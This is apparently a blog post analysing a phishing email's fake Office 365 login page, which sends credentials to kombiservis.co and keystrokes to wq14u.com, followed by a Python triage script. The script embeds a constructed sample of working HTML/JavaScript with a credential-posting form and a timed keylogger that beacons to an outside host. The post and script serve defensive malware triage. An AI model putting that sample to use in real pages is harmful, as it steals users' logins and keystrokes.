Let's Look At Malware I Got From Work
Today we're going to be looking at malware I received from a phishing attempt on my work email. Although I have zero skills in malware analysis, this piece of malware is very simple and uninteresting, so this shouldn't take very long.
Here's the email I received (with sensitive information censored). It's a WeTransfer download link to an HTML file, which is already incredibly suspicious, because who would send an HTML file? Anyway, let's pop this bad boy into a virtual machine.
Fun fact: I forgot to create a snapshot before opening the file. Make sure not to do this. As you can see, the file is just a fake Office 365 login page, which confuses me even more, because you can see from the address bar that you aren't logging into Office, so why would you put your details in? It also looks more like a Google login page than an Outlook one, which is more confusing still! Although I have heard that at least two people from my office have tried to use it, so what would I know. Getting back on track, let's go and look at the source code. Thankfully it is only HTML, so I don't have to do any real reverse engineering: we can just read the source in plaintext.
validateForm() is just a function to validate the email address; nothing interesting there. But we can see that the page sends a POST request containing the submitted credentials to kombiservis.co, which is presumably the attacker's collection server.
Going further down there's this interesting piece of code. I have no idea what it does, probably because it interacts with the minified code. Based on how it sets iframeUri to https://accounts.youtube.com/accounts/CheckConnection, I'm going to go ahead and assume that it attempts to find out whether you're logged into YouTube and take your credentials, as the link is very similar to https://accounts.youtube.com/accounts/SetSID, which is what Google uses to log you into YouTube when you're using other Google sites, such as Gmail.
The last piece we're going to look at is this simple keylogger, which collects the keys typed on the page into the variable keys and sends them as a GET request parameter every 10 seconds to wq14u.com, a different domain from the one we saw earlier.
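Reading the source by hand works for a kit this small, but the same read-through can be done mechanically, which is handy when the next sample is minified. The script below is an added example of my own (not code from the phishing kit or from the original post): it pulls form actions, URLs and timers out of the inline scripts, looks for keystroke hooks, and flags every domain a genuine Microsoft sign-in page would have no reason to contact. SAMPLE_HTML is a constructed stand-in modelled on the behaviour described above, not the real file, and the EXPECTED_DOMAINS allowlist is an assumption for the example.

```python
"""Static triage of a phishing-kit HTML file.

Extracts credential-post targets, exfiltration URLs, beacon timers and
keystroke hooks, then flags domains that do not belong to the brand the
page impersonates. Example code, not part of the original post.
"""
import json
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Constructed sample modelled on the kit described in the post: a form that
# POSTs to one domain, a keylogger beaconing to another every 10 s, and the
# copied Google CheckConnection URL. Not the actual phishing file.
SAMPLE_HTML = """
<html><body>
<form id="login" method="post" action="https://kombiservis.co/auth/login.php">
  <input name="email"><input name="password" type="password">
  <button onclick="return validateForm()">Sign in</button>
</form>
<script>
function validateForm() {
  var email = document.forms["login"]["email"].value;
  return /^[^@]+@[^@]+$/.test(email);
}
var keys = "";
document.onkeypress = function(e) { keys += String.fromCharCode(e.which); };
setInterval(function() {
  new Image().src = "https://wq14u.com/k.php?keys=" + encodeURIComponent(keys);
  keys = "";
}, 10000);
var iframeUri = "https://accounts.youtube.com/accounts/CheckConnection";
</script>
</body></html>
"""

# Assumed allowlist: domains a real Microsoft sign-in page is expected to use.
EXPECTED_DOMAINS = {"microsoftonline.com", "microsoft.com", "live.com", "office.com"}

URL_RE = re.compile(r"https?://[^\s'\"<>]+")
# setInterval(<anything>, <milliseconds>)  -- the beacon period.
INTERVAL_RE = re.compile(r"setInterval\s*\(.*?,\s*(\d+)\s*\)", re.S)
# Inline or addEventListener keystroke hooks.
KEY_HOOK_RE = re.compile(r"onkey(?:press|down|up)|addEventListener\(\s*['\"]key(?:press|down|up)")


class _KitParser(HTMLParser):
    """Collects form actions and the raw text of every <script> block."""

    def __init__(self):
        super().__init__()
        self.form_actions = []
        self.scripts = []
        self._in_script = False
        self._buf = []

    def handle_starttag(self, tag, attrs):
        attrs = dict(attrs)
        if tag == "form" and attrs.get("action"):
            self.form_actions.append(attrs["action"])
        elif tag == "script":
            self._in_script = True
            self._buf = []

    def handle_endtag(self, tag):
        if tag == "script":
            self._in_script = False
            self.scripts.append("".join(self._buf))

    def handle_data(self, data):
        if self._in_script:
            self._buf.append(data)


def _registrable(url: str) -> str:
    # Naive "last two labels" registrable domain; wrong for suffixes like
    # co.uk, but sufficient to separate brand domains from attacker hosts here.
    host = urlparse(url).hostname or ""
    return ".".join(host.split(".")[-2:])


def triage_html(html: str, expected=frozenset(EXPECTED_DOMAINS)) -> dict:
    """Return the indicators a practitioner wants from a credential-phishing page."""
    parser = _KitParser()
    parser.feed(html)
    parser.close()
    script_text = "\n".join(parser.scripts)
    script_urls = URL_RE.findall(script_text)
    domains = sorted({_registrable(u) for u in parser.form_actions + script_urls})
    return {
        "form_actions": parser.form_actions,
        "script_urls": script_urls,
        "timers_ms": [int(ms) for ms in INTERVAL_RE.findall(script_text)],
        "key_hooks": KEY_HOOK_RE.findall(script_text),
        "unexpected_domains": [d for d in domains if d not in expected],
    }


if __name__ == "__main__":
    print(json.dumps(triage_html(SAMPLE_HTML), indent=2))
```

On the constructed sample this reports the form posting to kombiservis.co, the beacon URL on wq14u.com with a 10000 ms timer, the onkeypress hook, and three domains outside the allowlist (the two attacker hosts plus youtube.com, which a Microsoft page would never load). Feeding it the real file is a quick way to get the indicators to block at the proxy and to hunt for in web logs.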
I've also heard from around the office that it sets up auto-delete and auto-reply rules on your email, which is probably something that's done once you enter your credentials into the form and they are POSTed to the server.